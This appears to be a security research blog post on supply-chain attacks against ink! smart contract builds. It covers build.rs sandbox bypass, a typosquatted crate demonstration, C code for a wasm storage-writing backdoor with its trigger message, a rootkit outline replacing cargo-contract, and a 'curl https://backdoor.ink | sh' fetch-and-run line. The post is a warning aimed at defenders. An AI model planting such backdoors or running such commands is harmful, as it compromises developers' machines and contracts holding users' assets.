ink! Smart Contracts lower the entry barrier for anyone who wants to write smart contracts in the Polkadot ecosystem. It is all very well explained here but in a nutshell, it is something like this:
You typically write code in domain-specific language ink! (mounted on Rust).
High-level code gets compiled to wasm.
wasm relies on imported methods provided by the environment.
wasm module must export 2 methods:
call
&deploy
.After deployment, all messages sent to that contract will be processed by
call
It all starts with a $ cargo install cargo-contracts
and it is a supply chain hell.
A supply chain hell
It is very well studied and accepted that downloading and installing a dependency package is essentially trusting its publisher to run code on your machine.
The toolchains and dependencies installed are jointly responsible for ultimately generating what the programmer imagined the resultant software should be. This works out well most of the time because programmers write irrelevant code. Or code that is not responsible for handling several millions in assets. The game and incentives change radically when there is much more at stake. Let's go through some of the critical points we think could be overtaken by an external attacker via a supply chain attack.
There is no lack of bad crate maintainers,
what is missing are investors. NineQueens
A quick inspection of the dependencies imported into the most rudimentary ink! contract, the flipper, reveals a significant number of contributors. As of the time of writing, there are 197 individuals (+48 GitHub teams) that can publish updates to the dependencies used in this contract. See the awesome cargo-supply-chain tool to generate such reports for you other projects.
TL;DR It is about trust…
ink! itself
In ink! there is a great effort to put rails on what the smart contract writer can do. This is done via a set of macros and tooling provided by cargo-contract
. The team behind it is a highly trustable team with aligned intentions and it is rather unlikely that they shot their foot backdooring the main repo.
Who controls it: github:paritytech:core-devs
What can be controlled by it: Everything
The Rust compiler
We simply trust compilers to death and there is little effort put in educating the programmers about tools to validate the compiled result. Checkout compiler explorer if you have not: here. For a starter, the most common installation process for Rust depends on running a shell script with super powers.
$ curl --proto '=https' --tlsv1.2 -sSf [https://sh.rustup.rs](https://sh.rustup.rs) | sh
This is well accepted, but it is also incredibly easy to replace with something else. There are no secret crypto signing meetings, long and complicated web3 proposals or any of that. It is someone controlling a good old web2 server and or TLS cert. It may involve more steps, but you get the point.
He who controls curl or static.rust-lang.org (or sudo or bash for that matter) controls your smart contracts (and potentially everything that your computer does from now onwards).
There are 2 notable mentions about trust deposited in compilers and this does not necessarily rely on a bad actor planting some backdoor. It is all under the brand WYSINWYX.
The old one, a compiler optimization removes a NULL pointer check from a Linux kernel enabling an exploit: here
The web3 one, Vyper compiler lies about adding a reentrancy check for months. Resulting in several contracts being deployed without the expected check and ultimately being exploited for millions: here
Who controls it: The guy that has .rust-lang.org dns (example)
What can be controlled by it: Everything
The Cargo Dependencies, Crates!
A crate is the smallest amount of code that the Rust compiler considers at a time.
A crate can come in one of two forms: a binary crate or a library crate. Binary crates are programs you can compile to an executable that you can run, such as a command-line program or a server. Each must have a function called main that defines what happens when the executable runs.
Library crates don’t have a main function, and they don’t compile to an executable. Instead, they define functionality intended to be shared with multiple projects.
No matter which flavor you choose, either if you install a binary crate or you add a library crate to a project you are trusting their admin to run arbitrary code on your behalf. And this code is going to be run at rather unexpected times.
A very thin sandbox
Let's check out exactly how this is done. We present to you build.rs
. This is part of standard Rust and it is explained in the book. In essence, running
$ cargo build
will run all the random build.rs
scripts provided by crates and dependencies. You allow all your dependencies to run arbitrary code on your behalf at installation time. This is also automatically run by IDEs like VSCode and it is one of the reasons you are regularly asked if you “trust this repo”. Good time to remember we are in the business of “less trust more truth”.
build.rs
is supposed to modify files only inside a specific part of the filesystem, configured by the environment variable OUT_DIR. If the build.rs
script goes outside that an error message printed out, or is it? Here is the code responsible for doing the check. This code does not actually check too much and any spawned process from build.rs
can easily bypass this restriction. You can try this from a fresh rust project like this:
$ cargo new build-rs-sandbox-bypass
That creates a fresh empty helloworld-like rust project:
fn main() {
println!("Hello, world!");
}
Now add your build.rs
file in the project root directory:
+-- build-rs-sandbox-bypass/
+-- src/
| +-- main.rs
+-- Cargo.toml
+-- build.rs <----- Create this file
// build.rs
use std::process::Command;
fn main() {
let _ = Command::new("touch")
.arg("/tmp/test.txt")
.output()
.expect("failed to execute process");
}
Now let Cargo.toml
know about your new build.rs
file
[package]
name = "build-rs-sandbox-bypass"
version = "0.1.0"
edition = "2021"
build = "build.rs" # You should add this line
[dependencies]
Now, executing cargo run
should build the project and run the main function, just printing "Hello, world!" in the terminal. But our planted build.rs
file also created /tmp/test.txt
file unexpectedly. That does not seem too bad but, it gets worse.
Who controls it: The person who uploaded the crate to crates.io.
What can be controlled by it: The computer, all the other projects around it, all the information that goes through it. Yes. Digest it. (Actually everything that can by done on behalf of the developer (i.e. not necesarily root))
Typosquatting cargo-contract
If you were reading closely you may have noticed an extra S in the suggested line at the beginning of the post. Here it is again, can you spot it?
$ cargo install cargo-contracts
This is a fake crate that exists only to prove to you that ANY dependency you add to any of your multiple Rust projects in any part of your filesystem can take full control of your computer. Cosmic rays can flip a bit in your memory and redirect your dependency to something else but more likely just a typo can mess you up. If you run that line you are owned. The next steps involve the usual forensic analysis, the destruction of your current laptop and the acquisition of a new one. Happy times!
Watch it again. Just by installing
cargo-contracts
, we are modifying the originalcargo-contract
behavior by adding a WARNING legend.
An ink! Backdoor
One of the best ways to grasp what is required for an external attacker to hijack your contract is to put yourself in their position. We are interested in the technical aspect, we assume that with enough incentives bad actors will find a way to persuade, bribe or extort people with the power to change the items from your Bill Of Materials. Lets go full evil and see what can be done to your contract from a crate gone wild.
The Life of ink! message
Sending a successful message to a contract is somewhat a complex task if you look closely enough. The process starts with the execution of an extrinsic named call()
within the context of Polkadot.js. Using SCALE, the input is encoded according to the ABI configured with the contract.
Once the wasm contract code is executed it calls input()
to retrieve a buffer containing all input data. Normally something like:SELECTOR+SCALE(ARGS)
. Subsequently, the wasm module checks the selector, and if it aligns with one of the contract's compiled methods, a get_storage
operation is triggered to fetch the smart contract storage into memory. Lots of scale encodings and decodings are applied to allow data to go "through the wires" or to be stored.
By default, the smart contract data resides in the storage slot 0x00000000
. And it is loaded to memory at the beginning of the execution. If the execution proves successful and modifies the memory version of the storage, the final step calls a set_storage
to ensure that the data is written back to the contract storage. Until this juncture, all modifications occurred solely in memory. To conclude the process, a function named seal_return
is invoked.
The backdoored dispatcher
This is a trivial backdoor that allows to set values in arbitrary storage slots. The basic attack could be to take snapshots of the storage and then replay them later when it is convenient.
The target contract call()
is renamed to inner_call()
in the implantation process. The backdoor_distpatcher
acts as a guard and will call the payload only when certain conditions are met.
void call()
{
backdoor_distpatcher();
inner_call();
}
This backdoor_dispatcher
is hooked and prepended to the normal ink! smart contract entry point. backdoor_dispatcher
will interject itself at the beginning of the execution flow before the normal message dispatching of the infected contract.
The added code at backdoor_dispacher
will decide over an arbitrary condition (e.g. the message starts with AAAA
) if the backdoor payload must be executed or not. Otherwise, the control is sent back to the original contract. Simple.
This imports the externally provided host functions, syscalls or hypercalls.
extern void input(void *value, int *value_size_ptr);
extern int set_storage(void *key, int key_size, void *value, int value_size);
extern void seal_return(int, void *result, int result_size);
extern void inner_call();
Here the attacker just needs to send AAAA
at the beginning of the message. However other more complex scenarios can be implemented. e.g. using unused bits, signing special messages, steganography, etc.
void backdoor_distpatcher()
{
char buffer[16384];
int size_input = sizeof(buffer);
void *ptr = &buffer;
// Using the stack as a buffer for the input
// This is going to be unwind/free when we return from my_dispatcher
input(&buffer, &size_input);
if (*((int *)ptr) == 0x41414141)
{
unsigned key_size = *(int *)(ptr + 4);
void *key_ptr = ptr + 8;
unsigned value_size = *(int *)(ptr + 8 + key_size);
void *value_ptr = ptr - 8 + key_size + 4;
int ret = set_storage(key_ptr, key_size, value_ptr, value_size);
seal_return(0, &ret, 4);
}
}
To set the value 01
in the storage slot 00000000
send a message with this looks: 4141414101000000000000000100000000
ink!Backdoor to ink!Rootkit
Ok so we have a way to obtain execution in the builder's computer and we have a way to add a wasm
level backdoor to any created ink! smart contract. This is knowingly borderline just wrong but given the number of times we run cargo build
a day we are set to drive it further. We want you to be alert when running you next cargo build
. Let's make a full ink! rootkit. This will demonstrate that after adding a dependency into any rust project all ink! contracts generated from your system after that will contain a backdoor.
Yes, you add a dependency to Project A and the results in Project B change.
Let it sink.
Here it is a simple way to plant a rootkit so every Ink smart contract compiled in the future is backdoored.
Make a backup copy of the cargo-contract binary into cargo-backup
Replace cargo-contract for some arbitrary python.
Control all cargo-contract commands
You can install it like this on your friends laptop
$ curl https://backdoor.ink | sh
Nah, that is too much. We tested something like that and it works. Please Be careful of what you install. Check out the demo.
Demo
Conclusions/Takeaways!
It is very hard to generate Ink! smart contract (and perhaps substrate runtimes) in a trust-less fashion having so many moving parts.
Developers are warned against blindly installing dependencies, as a compromised dependency can have far-reaching consequences. Remain vigilant, conduct thorough code reviews, and implement security measures to mitigate the risks associated with supply chain attacks.
We think that a low-level analysis and reverse engineering of the resultant artifacts is a must for very high-stake contracts.
We like the trustless solution. This proposal is more of a mitigation and involves using tools to read low-level representations of your contract. Checking the low-level generated code before you release it has all the same problems. You will be using untrusted software to read and analyze it. It just adds an extra layer and makes it more annoying for the attacker to effectively hijack the tooling in your critical path.
A word on determinism.
Deterministic compilation is a hot topic when building artifacts that will later participate in some distributed consensus system. Everybody involved must be able to regenerate the same low-level code from the same high-level code. This has been proven to be annoying with rust in general. Developers rely on sharing containers where they can trust
the compilation will be identical no matter where they are. This simply pushes all the same problems we showed here inside the container. And also adds several new angles involving Dockerfiles and Dockerhub. More on this soon, maybe.
Next…
What about main substrate runtimes and parachains?